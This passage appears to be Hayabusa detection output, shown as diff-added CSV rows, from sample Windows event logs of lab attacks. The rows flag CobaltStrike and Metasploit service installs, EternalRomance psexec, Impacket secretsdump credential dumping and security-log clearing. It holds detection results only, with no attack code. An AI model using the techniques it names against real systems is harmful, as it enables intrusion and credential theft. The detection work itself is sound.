+2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\WindowsPowerShell\v1.0\powershell.exe : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:56:41.818 
+09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\WindowsPowerShell\v1.0\powershell.exe : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5145-remote shell execution via SMB admin share.evtx +2021-04-21 23:56:41.897 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,CobaltStrike Service 
Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx +2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx +2021-04-22 17:50:53.614 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x74872,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: 0Konuy9q8HtkWeKS : IP Address: 10.23.123.11 : Port: 41747 : LogonID: 
0x74872,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4624,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.780 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: FS03VULN$ : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: FS03VULN$ : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\WindowsPowerShell\v1.0\powershell.exe : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.796 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: FS03VULN$ : Share Name: \\*\IPC$ : Share Path: : IP Address: 
10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:05.758 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 60163 : LogonID: 0x76e83,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:05.758 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x76e83,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:06.539 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x7777e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:06.554 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 60163 : LogonID: 0x7777e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\desktop.ini : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:19.213 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:19.291 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:22.992 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: 
admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:22.994 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP\DESKTOP.INI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec 
(GLOBAL).evtx" +2021-04-22 17:51:23.025 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.025 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.042 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.044 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.044 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.060 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.171 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 18:00:09.959 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:10.026 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0xb3084,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:10.026 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 60285 : LogonID: 
0xb3084,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:11.118 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0xb314d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:11.118 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 60232 : LogonID: 0xb314d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0xb32cb,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 50078 : LogonID: 
0xb32cb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:14.421 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:14.437 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: SYSTEM32\BTeHLZkJ.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:14.437 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:14.735 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: SYSTEM32\NMdzZfem.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:14.735 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote 
Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: SYSTEM32\BTeHLZkJ.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: SYSTEM32\NMdzZfem.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:19.875 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:20.003 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.544 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.560 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP\DESKTOP.INI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.606 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.606 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 